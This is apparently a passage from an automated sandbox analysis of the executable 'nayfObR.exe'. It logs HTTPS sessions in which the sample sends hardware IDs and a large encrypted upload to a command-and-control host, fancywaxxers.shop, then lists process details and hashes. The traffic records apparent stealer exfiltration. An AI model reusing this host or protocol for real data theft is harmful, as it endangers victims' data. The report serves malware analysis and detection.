2025-01-03 13:34:02 UTC	274	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=PAI49V4K5 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 20511 Host: fancywaxxers.shop
2025-01-03 13:34:02 UTC	15331	OUT	Data Raw: 2d 2d 50 41 49 34 39 56 34 4b 35 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 35 30 33 37 37 44 34 33 34 31 45 46 33 35 43 42 38 32 32 44 31 46 34 39 37 38 30 32 31 30 38 36 0d 0a 2d 2d 50 41 49 34 39 56 34 4b 35 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 33 0d 0a 2d 2d 50 41 49 34 39 56 34 4b 35 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 37 74 78 32 6a 6f 2d 2d 35 31 36 0d 0a 2d 2d 50 41 49 34 39 56 34 4b 35 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 Data Ascii: --PAI49V4K5Content-Disposition: form-data; name="hwid"50377D4341EF35CB822D1F4978021086--PAI49V4K5Content-Disposition: form-data; name="pid"3--PAI49V4K5Content-Disposition: form-data; name="lid"7tx2jo--516--PAI49V4K5Content-Dispos
2025-01-03 13:34:02 UTC	5180	OUT	Data Raw: 00 00 00 00 00 00 00 00 00 00 80 75 6e 20 0a e6 d6 fd 34 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b0 ce 0d 46 c1 dc ba 9f 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d6 b9 81 28 98 5b f7 d3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 3a 37 18 05 73 eb 7e 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 58 e7 06 a2 60 6e dd 4f 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 eb dc 60 14 cc ad fb 69 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 9d 1b 88 82 b9 75 Data Ascii: un 4F([:7s~X`nO`i`u
2025-01-03 13:34:03 UTC	1136	IN	HTTP/1.1 200 OK Date: Fri, 03 Jan 2025 13:34:03 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=b2mutrto1h75dhdlacn7cc076i; expires=Tue, 29 Apr 2025 07:20:42 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=2kNOWHwOAUbWJVk0E%2BYxNkpTahmZy27AfAgda846N4KnNVLpTy6NNLEZNJ%2BHDfGmsjOruJQyuJjAB0%2F6WHhSAHusQETS7isNKftum8OWpVGd3oHNaAHufW%2Bj9I2E0QjhxgptMw%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8fc35d3069538cda-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1767&min_rtt=1755&rtt_var=682&sent=11&recv=26&lost=0&retrans=0&sent_bytes=2844&recv_bytes=21465&delivery_rate=1575822&cwnd=242&unsent_bytes=0&cid=57d3ff2f2a3bf646&ts=1635&x=0"
2025-01-03 13:34:03 UTC	20	IN	Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a Data Ascii: fok 8.46.123.189
2025-01-03 13:34:03 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.5	49709	104.21.32.1	443	6540	C:\Users\user\Desktop\nayfObR.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-03 13:34:04 UTC	279	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=I0TGGFGD09V4Z2V8 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 952 Host: fancywaxxers.shop
2025-01-03 13:34:04 UTC	952	OUT	Data Raw: 2d 2d 49 30 54 47 47 46 47 44 30 39 56 34 5a 32 56 38 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 35 30 33 37 37 44 34 33 34 31 45 46 33 35 43 42 38 32 32 44 31 46 34 39 37 38 30 32 31 30 38 36 0d 0a 2d 2d 49 30 54 47 47 46 47 44 30 39 56 34 5a 32 56 38 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 49 30 54 47 47 46 47 44 30 39 56 34 5a 32 56 38 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 37 74 78 32 6a 6f 2d 2d 35 31 36 0d 0a 2d 2d 49 30 54 47 Data Ascii: --I0TGGFGD09V4Z2V8Content-Disposition: form-data; name="hwid"50377D4341EF35CB822D1F4978021086--I0TGGFGD09V4Z2V8Content-Disposition: form-data; name="pid"1--I0TGGFGD09V4Z2V8Content-Disposition: form-data; name="lid"7tx2jo--516--I0TG
2025-01-03 13:34:12 UTC	1143	IN	HTTP/1.1 200 OK Date: Fri, 03 Jan 2025 13:34:12 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=ae97ik6g415ckonectgdfrihne; expires=Tue, 29 Apr 2025 07:20:51 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2FhDGI%2FpHhwwo6lGXvsJHRcN8fJ%2BcDGC5ZOJw0TzPndhVnzzokttCGRguJ%2B%2B4U5%2FfAFAuUpznH5v08o5FmiaY%2FOCj2t%2BXD8LwyOoFJjVdgDgPGc3Tj0B0GjLTqe1u9okG%2Bv8GBA%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8fc35d406ad78cda-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1817&min_rtt=1811&rtt_var=692&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2843&recv_bytes=1867&delivery_rate=1565683&cwnd=242&unsent_bytes=0&cid=1234632422bd42d2&ts=7598&x=0"
2025-01-03 13:34:12 UTC	20	IN	Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a Data Ascii: fok 8.46.123.189
2025-01-03 13:34:12 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.5	49710	104.21.32.1	443	6540	C:\Users\user\Desktop\nayfObR.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-03 13:34:13 UTC	275	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=6RJDBLF9V User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 585960 Host: fancywaxxers.shop
2025-01-03 13:34:13 UTC	15331	OUT	Data Raw: 2d 2d 36 52 4a 44 42 4c 46 39 56 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 35 30 33 37 37 44 34 33 34 31 45 46 33 35 43 42 38 32 32 44 31 46 34 39 37 38 30 32 31 30 38 36 0d 0a 2d 2d 36 52 4a 44 42 4c 46 39 56 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 36 52 4a 44 42 4c 46 39 56 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 37 74 78 32 6a 6f 2d 2d 35 31 36 0d 0a 2d 2d 36 52 4a 44 42 4c 46 39 56 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 Data Ascii: --6RJDBLF9VContent-Disposition: form-data; name="hwid"50377D4341EF35CB822D1F4978021086--6RJDBLF9VContent-Disposition: form-data; name="pid"1--6RJDBLF9VContent-Disposition: form-data; name="lid"7tx2jo--516--6RJDBLF9VContent-Dispos
2025-01-03 13:34:13 UTC	15331	OUT	Data Raw: e4 5d 60 69 d9 ce fd f2 b4 72 93 20 21 bd f3 d5 e3 42 16 46 aa b0 ef c1 27 cc 77 85 0e 7d 5c 9e 38 ad 1c 5d 25 08 c4 2a 27 9f e7 03 ea 54 03 56 bb fc d4 82 43 af c1 af a7 ab 95 ae ff c9 a1 60 71 ce c8 eb 07 a1 ae a2 ac c5 df d4 f6 c7 f0 47 27 18 c0 17 e5 5b 6d 0f ca db 20 3f f7 0b d8 b9 31 3b 9e e9 b2 fe e7 0f ca dc 99 55 7e 77 2b 81 c9 6e 48 1e 19 bd 37 f6 80 fd 48 57 a9 53 60 6f fe 5b 68 3b ea f2 18 b0 4b be fc 6f 43 67 5d 35 c2 0f 3a c0 1c 0e 11 9b d4 7c 04 70 bc 12 01 92 4c d3 06 73 34 d6 3f 99 55 40 09 90 44 71 77 50 42 f6 c7 c1 5b 9b 94 0b 9d 76 10 73 9f 5c bf 30 70 7c 90 e9 ec 83 03 2d f3 9b de 16 e8 78 c9 a7 ce e5 90 92 06 4c 95 e4 97 ea d2 82 36 df a7 45 26 7e 30 67 89 76 cb d1 2f 70 a1 b8 11 15 b1 e7 3f 27 35 78 53 7a 49 d4 1a 2b 45 9d 21 58 a1 Data Ascii: ]`ir !BF'w}\8]%*'TVC`qG'[m ?1;U~w+nH7HWS`o[h;KoCg]5:\|pLs4?U@DqwPB[vs\0p\|-xL6E&~0gv/p?'5xSzI+E!X
2025-01-03 13:34:13 UTC	15331	OUT	Data Raw: ed 83 b9 d4 af 51 25 ba d8 db 7c ca ac a0 af 00 38 bb 4d 0f 72 ef ec 98 61 38 6d 56 0e 2c 55 ee 58 b0 3f c0 6b 1f 0a 1e 4f 5c b8 a9 78 99 5e b7 3e bf 38 68 a6 b7 b8 a2 43 ff a3 05 10 3b 17 a3 8e 68 05 e5 64 fa bf 30 d9 98 7a ea 7c 75 38 41 65 6f f5 4c 7d b7 c9 9e ac aa 6d 68 f8 01 83 48 49 42 81 78 33 af b6 1a eb 41 86 3c 37 94 d7 4d 1f fa df 73 2a 4f 03 fa ee df da e3 a1 17 04 22 2e 80 f0 a1 9b e1 1e 80 2d fb 14 80 93 66 a0 3f 1c f4 5f 9f f1 41 be 2d 06 14 9e 13 b7 f9 7f 0f e7 49 3a 2a 60 f3 5a 14 41 cf 82 50 63 45 13 43 00 e0 31 c2 cd 20 ab a1 b6 ba a9 b1 1c 1d c0 7c 50 33 52 6b cd c1 ca d2 70 23 52 60 d5 43 cb fc fc dc 89 dd d3 3a 3e 41 77 46 77 8a d3 b0 70 75 73 d1 3f 87 6f bd 1e 5b 2d 6e a7 00 73 4d 01 57 34 12 54 83 12 62 ca 1d 96 8e 98 dd c4 56 6c Data Ascii: Q%\|8Mra8mV,UX?kO\x^>8hC;hd0z\|u8AeoL}mhHIBx3A<7MsO".-f?_A-I:`ZAPcEC1 \|P3Rkp#R`C:>AwFwpus?o[-nsMW4TbVl
2025-01-03 13:34:13 UTC	15331	OUT	Data Raw: c8 45 7d 10 a9 18 2f 8e de b3 9b 5d 78 94 c9 77 f8 c8 78 05 5d 61 a6 25 4b 5e 49 c1 39 cc 01 5c 81 65 d6 19 f9 0b 38 c4 f6 1a 83 06 97 5b 08 bf 7b f4 33 db c9 5c a7 54 0f 9e e4 a7 70 5a 57 98 14 07 fe 85 95 af d8 8d 95 fa 57 07 ac 96 55 7c 53 25 6d a9 05 38 a6 54 3f 3f f9 e0 07 e7 20 38 12 72 49 04 f0 36 65 90 48 43 82 34 b0 4b b9 98 11 28 d4 64 6f ec a8 e6 9b 15 64 29 5d d3 5d 06 08 fb b7 b5 a2 e6 d9 0b 25 82 af c5 80 e8 c1 ab 23 8e ca 60 a3 87 13 cc 91 e4 ae ce fa 14 7d 60 4d 0b 71 b6 d0 15 eb aa d4 b2 1c 6e e4 37 bf 9e cf ec c9 82 f9 d6 60 b3 7a ef 3f 5c 83 af dc f8 1e 01 9a 2a e8 29 bc 3d f9 d6 28 f5 64 b6 48 3d 5b b2 5c 9d f8 96 5e 6b d3 b8 f8 32 75 ed 89 59 f1 6f a1 34 c5 73 06 dc 93 bc 68 eb d0 e6 fa ea 80 13 5e 74 90 96 56 91 b7 b1 3c 32 fd c8 e1 Data Ascii: E}/]xwx]a%K^I9\e8[{3\TpZWWU\|S%m8T?? 8rI6eHC4K(dod)]]%#`}`Mqn7`z?\*)=(dH=[\^k2uYo4sh^tV<2
2025-01-03 13:34:13 UTC	15331	OUT	Data Raw: 3e c7 d4 bb 5d 1f c1 c7 1d 74 c2 77 bc ff b0 cc f6 fc 27 06 5e 7e f7 f5 9c 89 ec 58 97 3b 45 9f 4f eb 8a dc 7f a8 47 70 70 a0 f5 34 de 3c 44 1c de df ac 11 4e 38 78 78 e6 37 ed a8 65 4e 64 22 23 be c0 58 60 5c ac c6 5e 37 6f e1 cc 68 96 be 80 97 af 86 7c 34 ff 4a 7e 87 fa f1 dd ed 70 bc c0 2e ad cb a7 89 99 11 f8 e7 f7 da bb 72 97 39 25 82 27 e6 7d 2e 3b 47 61 86 a1 7b f2 18 41 29 c4 7a 43 66 30 bb 58 23 f7 85 14 1e 73 0e e4 ed 11 8c 52 a6 54 5c b4 eb 8f 42 2c 24 ce d6 ea 2b 7a ff df a9 fa ff df 05 52 21 cb 13 30 21 38 b0 5a 47 53 f4 81 16 1c 1a 8f e9 07 6f 5b 41 2a b1 0e 97 80 40 70 ce a4 71 fd 1c 81 4d b8 2b 1a c0 57 44 d6 a2 bb d1 a0 94 a7 3c 0f 1f a5 91 f4 d3 65 78 ac b5 21 c8 7a af 26 6f 1b fd df d1 74 f3 10 33 08 43 5e 96 06 82 3f 84 3b 03 8b bc 40 Data Ascii: >]tw'^~X;EOGpp4<DN8xx7eNd"#X`\^7oh\|4J~p.r9%'}.;Ga{A)zCf0X#sRT\B,$+zR!0!8ZGSo[A*@pqM+WD<ex!z&ot3C^?;@
2025-01-03 13:34:13 UTC	15331	OUT	Data Raw: 3b ea 5c be 5b fc ee b5 2e 9a 4c d7 01 75 e1 31 b3 17 67 a9 cb 7c 43 f9 a8 f0 b3 84 47 7b 3c 82 52 91 26 0a 55 d7 7c d8 c9 83 61 63 b1 6d f6 43 06 3c 28 b7 e5 c8 7a ca 73 27 0f 9f 8d e4 1a e2 19 ea f3 77 71 27 5f 8f 0a e0 90 0d a6 0c b9 b1 aa 04 4c 54 00 0e b8 35 99 cb 50 b4 33 61 0f 4d 7c a1 89 b6 04 fa f8 0c 35 08 82 b8 57 85 57 0e 4f 8d 05 92 fa 55 e7 06 43 8d 94 7e 36 6d 98 82 46 0b d5 c4 90 78 24 b6 64 45 40 5f 0f b9 b6 79 c1 37 79 68 36 29 66 a7 6f 51 75 e5 a7 7f 50 6a 2f d5 ef 1a c9 29 ad f2 41 73 11 64 fd 2a a5 74 bb e0 c4 3e 14 30 b3 fa fb 1d 3d d7 0c 34 06 94 02 38 77 45 ad f6 05 48 f4 8f 7b 66 e8 c4 13 e2 1c 0d 56 39 6b 5a 45 7f 90 b3 09 eb dd 7f 58 0a 64 e1 3c 47 bd dd cb 5c 66 1d 15 2a 4e b1 a5 42 a9 fe 67 09 0b 32 63 29 a6 d8 c6 d3 81 a9 bf Data Ascii: ;\[.Lu1g\|CG{<R&U\|acmC<(zs'wq'_LT5P3aM\|5WWOUC~6mFx$dE@_y7yh6)foQuPj/)Asdt>0=48wEH{fV9kZEXd<G\fNBg2c)
2025-01-03 13:34:13 UTC	15331	OUT	Data Raw: 68 c9 41 80 a1 6d 90 d7 7d 04 bc 3f aa 2a b0 b0 3c b9 9c 55 a3 1b 83 99 b5 1c 36 91 46 92 fe a5 a4 ac 21 af 33 55 22 44 e9 96 cb c9 14 23 80 6f 26 52 2b 6c cb 7c ce c6 12 ab 0e 6f f7 7c a7 c8 ee a4 b7 0c 77 be 4f d4 f2 2d f5 e4 cc bb 73 7c e8 4b 8b 9f 29 eb ee ef 7e a8 2f fe 04 a4 0c 1f 46 92 fe 0b 04 6d 7f 40 e9 95 9e 1d 31 24 cd fc ae 97 cb 2d e0 61 a4 05 96 9a 37 ed fd 26 be 73 84 8a c9 99 98 10 53 1c 60 17 df ca 78 d1 99 b3 99 fc dd 56 09 ca b2 c9 f0 fe ee 9b 8e 02 7f ca 90 9c fc 37 57 41 46 9b 25 0e 7c 1a e1 a2 16 9e 2e 4b fc ec 7b 1b 2e 51 69 fe 01 42 25 cc 35 ff 60 de 4d d1 b9 27 ce 38 86 d1 fa d9 63 6b d6 2c 87 e7 f5 37 3a c7 76 ac 02 ef ba b2 65 cd f7 1d f7 99 64 5e 5a 3f dd 7f fc cb f0 33 24 2c e0 61 99 b4 be 58 35 7b 95 07 1b 73 24 8a 53 94 9a Data Ascii: hAm}?*<U6F!3U"D#o&R+l\|o\|wO-s\|K)~/Fm@1$-a7&sS`xV7WAF%\|.K{.QiB%5`M'8ck,7:ved^Z?3$,aX5{s$S
2025-01-03 13:34:13 UTC	15331	OUT	Data Raw: 11 b0 93 af 4f eb c9 2f 3d b5 a0 1a 41 a4 73 ad 76 48 7c 7a c8 82 7a 1b 0e 7a 09 18 18 cc ac 77 34 b3 1c 0f f2 76 49 81 bd cc a3 0d f5 ee 80 b2 0f 9f 11 1b 3d 20 02 0a b3 57 fd 5b 8f 98 31 5e 09 80 3d 2d b0 3a 3e f3 18 70 12 c7 06 3e 15 eb 9a e1 01 07 78 5c b1 c0 e5 30 6c 0f ec 46 47 e0 52 cc 4b 31 fc 99 77 b4 6f a3 3e 6e d1 af ba 08 e0 12 3b 5d 99 fd f0 da 60 93 19 01 65 ff 99 c2 07 8d 1f 23 a3 39 fe fb f1 2a 0c 95 56 13 b9 f6 9f 98 1d 8c 5b 17 94 b0 00 93 26 db 68 44 36 58 75 c2 9c 02 64 73 72 42 92 a7 04 e5 24 40 11 33 e4 ab 0f 98 93 2f 91 99 ca 50 8e c1 ef fb 03 67 4d 51 75 aa d5 ab 37 1b d3 1c ee e0 b3 62 a7 d7 ec 81 14 78 34 fb d2 0b 09 12 4f af a0 97 8c c6 eb 4f 1f 6f e8 5e cd 17 6c 58 2c 6c 63 bd 5c 08 75 49 6b 81 bd 2c 2b 01 3c bd e6 b5 43 6a 3f Data Ascii: O/=AsvH\|zzzw4vI= W[1^=-:>p>x\0lFGRK1wo>n;]`e#9*V[&hD6XudsrB$@3/PgMQu7bx4OOo^lX,lc\uIk,+<Cj?
2025-01-03 13:34:13 UTC	15331	OUT	Data Raw: 57 02 5a 21 59 37 09 3d b6 ce f2 96 38 d2 10 4d cf b6 69 1b 05 d0 18 31 ba 75 4e 6b 78 b4 de b9 89 91 4e 49 c5 0e d9 e8 e4 2d 24 8d 8b df e2 93 44 ec 42 4a d9 39 0d 52 3b 84 e6 c5 05 7c 2d ae 86 5e 89 a1 5a 54 e9 6d a8 27 8d 72 e4 fb 5b 3e e2 83 30 cf 7c 9f 3e 4d 02 75 ef 01 ad f6 8d ca 99 1f 24 bb 23 a6 53 9b 5f 83 87 2a 7e 90 74 44 5c af 40 0a 77 2c ea 46 f3 e6 f9 ac 63 4d 66 40 d7 cc 97 41 06 0a 5c 69 51 1c a0 bd e6 79 9f 3e 47 73 01 31 fe bc de bf d2 81 dd 24 fb a7 1a b9 1a e1 7d d7 0c c6 ea 3a 09 85 b6 e4 36 2e 5a 8e 7f 65 93 c0 7a 24 71 bd f7 86 87 0b e6 af 2b dc cf 7b a4 60 0a 1c 5d 05 50 f9 f2 61 a1 f1 70 12 4a 74 16 1a 13 5e 7c be 85 70 16 92 9d 59 ae 01 36 48 01 8c 72 3e 1d 67 d4 3c 43 c2 a7 58 a3 d4 9e 67 d8 0c 62 27 a1 53 88 45 27 62 58 b6 ac Data Ascii: WZ!Y7=8Mi1uNkxNI-$DBJ9R;\|-^ZTm'r[>0\|>Mu$#S_*~tD\@w,FcMf@A\iQy>Gs1$}:6.Zez$q+{`]PapJt^\|pY6Hr>g<CXgb'SE'bX
2025-01-03 13:34:13 UTC	15331	OUT	Data Raw: b7 7e 30 f3 36 8c f7 8c b1 92 d8 b3 9e a2 91 43 33 5d 52 be 80 72 36 0f 94 41 fc 3c 25 3b 44 13 06 ee 3b f3 89 28 b8 a2 18 d3 f7 c0 2e 51 bc ff df 57 a8 ab 52 3d b5 b4 0f 81 c2 73 c7 6d e8 b4 0e 92 0a 0a 64 a9 5e a0 c2 70 38 6a 07 58 40 ad ed 62 e5 d2 a8 28 18 15 8f a2 e1 61 c2 20 5c 81 b1 37 13 c4 be a3 02 62 8b 3b 00 b0 e7 72 10 ff 36 4c 30 86 d4 b7 da be 8f 9c 74 c0 bd bd 56 a5 bf 3b 5e 3d 47 b8 e5 00 1e 7b 8e e2 00 51 bc 7e d6 67 ff 2d f8 40 78 68 60 07 0b 18 e5 8e 71 c7 09 9f c3 16 15 75 fc 9c af ab 05 c5 a4 dd d1 d0 9a c2 ea 5b 23 84 07 02 c1 c6 40 a8 2e f1 d4 b0 c6 aa 35 ab 4a 4e 3a 08 0d 25 91 1b 63 10 5c a4 18 ea 3d 72 fb 93 63 f8 be 24 38 7c f5 af 12 cb ba e2 d2 7d 3c a2 ff f1 8b 90 aa 94 d4 8c 0b 6b 92 22 68 86 9b 05 b2 41 b5 10 74 5e 9e 23 27 Data Ascii: ~06C3]Rr6A<%;D;(.QWR=smd^p8jX@b(a \7b;r6L0tV;^=G{Q~g-@xh`qu[#@.5JN:%c\=rc$8\|}<k"hAt^#'
2025-01-03 13:34:15 UTC	1133	IN	HTTP/1.1 200 OK Date: Fri, 03 Jan 2025 13:34:14 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=6gfufi03h7clqfi005oi8dh8vl; expires=Tue, 29 Apr 2025 07:20:53 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=y5hUZc5qkmUANtmwcWPBTvfZEW7L3omvgaHOI6NBwG2Z%2FCGGwM4mIjkruaQjm688PMS60hMz2miR7epHCx58JYePOsVz3aNknWmVMH0CUTYzmkrAZNvRtNSFsSU9xWT6SW4H3Q%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8fc35d755baa8cda-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1790&min_rtt=1780&rtt_var=689&sent=201&recv=602&lost=0&retrans=0&sent_bytes=2843&recv_bytes=588543&delivery_rate=1564844&cwnd=242&unsent_bytes=0&cid=70fafba9ff31771f&ts=1659&x=0"

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.5	49716	104.21.32.1	443	6540	C:\Users\user\Desktop\nayfObR.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-03 13:34:15 UTC	265	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 80 Host: fancywaxxers.shop
2025-01-03 13:34:15 UTC	80	OUT	Data Raw: 61 63 74 3d 67 65 74 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 37 74 78 32 6a 6f 2d 2d 35 31 36 26 6a 3d 26 68 77 69 64 3d 35 30 33 37 37 44 34 33 34 31 45 46 33 35 43 42 38 32 32 44 31 46 34 39 37 38 30 32 31 30 38 36 Data Ascii: act=get_message&ver=4.0&lid=7tx2jo--516&j=&hwid=50377D4341EF35CB822D1F4978021086
2025-01-03 13:34:16 UTC	1129	IN	HTTP/1.1 200 OK Date: Fri, 03 Jan 2025 13:34:16 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=5439pr99u98q5vo9khteia4ebk; expires=Tue, 29 Apr 2025 07:20:54 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=gqjfX6YDYuYV69we2hdu6HF0p9e7YswQ%2B1rUyYU0yxlyx7x4bbU%2Buh3CTJbiYfi7Y1sEzYOcAMNEvob62D1uPOS2iqxbcON7R%2FH2Jd2bqNa676DVNR7Fdq0MJq317HWH9JT1rg%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8fc35d840fd972b9-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1788&min_rtt=1786&rtt_var=674&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2842&recv_bytes=981&delivery_rate=1616832&cwnd=214&unsent_bytes=0&cid=3ed65f2568b95b74&ts=444&x=0"
2025-01-03 13:34:16 UTC	54	IN	Data Raw: 33 30 0d 0a 33 77 65 66 68 48 53 79 30 32 39 4b 41 33 30 4d 6c 61 61 63 6a 53 41 44 37 6d 32 57 31 75 49 7a 68 30 69 2b 52 4b 79 79 4d 44 4b 45 57 67 3d 3d 0d 0a Data Ascii: 303wefhHSy029KA30MlaacjSAD7m2W1uIzh0i+RKyyMDKEWg==
2025-01-03 13:34:16 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Target ID:	0
Start time:	08:33:55
Start date:	03/01/2025
Path:	C:\Users\user\Desktop\nayfObR.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\nayfObR.exe"
Imagebase:	0x5a0000
File size:	535'040 bytes
MD5 hash:	138FCF999A87419BE2C7E5E036601466
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	1
Start time:	08:33:55
Start date:	03/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	3
Start time:	08:33:55
Start date:	03/01/2025
Path:	C:\Users\user\Desktop\nayfObR.exe
Wow64 process (32bit):	true
